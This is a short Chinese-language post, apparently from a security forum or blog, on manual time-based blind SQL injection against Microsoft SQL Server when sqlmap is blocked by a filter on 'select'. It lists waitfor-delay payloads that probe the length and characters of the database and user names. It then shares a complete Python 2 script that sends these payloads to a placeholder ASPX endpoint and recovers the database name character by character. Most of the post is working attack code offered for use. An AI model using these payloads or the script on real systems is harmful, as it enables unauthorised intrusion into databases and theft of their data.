sqlmap爆mssql數據庫時采用的語句如下圖:
從語句中不難看出,如果關鍵字select被“(非tamper繞過)處理”了,那sqlmap是無法爆出數據庫的,這時我們可以使用原始的猜解法,
#判斷數據庫和用戶名長度
'+if(len(db_name())=%s)+waitfor+delay+'0:0:5'--
'+if(len(user_name())=%s)+waitfor+delay+'0:0:5'--
#循環注出數據庫和用戶名
'+if(ascii(substring(db_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--
'+if(ascii(substring(user_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--
分享一個最近用的時間延遲盲注爆庫名腳本(手工測下庫名長度):
import urllib import urllib2 import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } values={} print 'Start to retrive database:' user= '' for i in range(1, 20): for payload in payloads: startTime=time.time() try: values['action']='getvideo' values['pc_mob']='GP' values['years']="' if(ascii(substring(db_name(),%s,1))=%s) waitfor delay '0:0:5'--" % (str(i),ord(payload)) data = urllib.urlencode(values) url = "http://www.xxx.com/operation.aspx" geturl = url+'?'+data request = urllib2.Request(geturl,headers=header) response = urllib2.urlopen(request) if time.time()-startTime>5: user+=payload print 'the database is:'+user break else: print 'dumping database...' except Exception,e: print e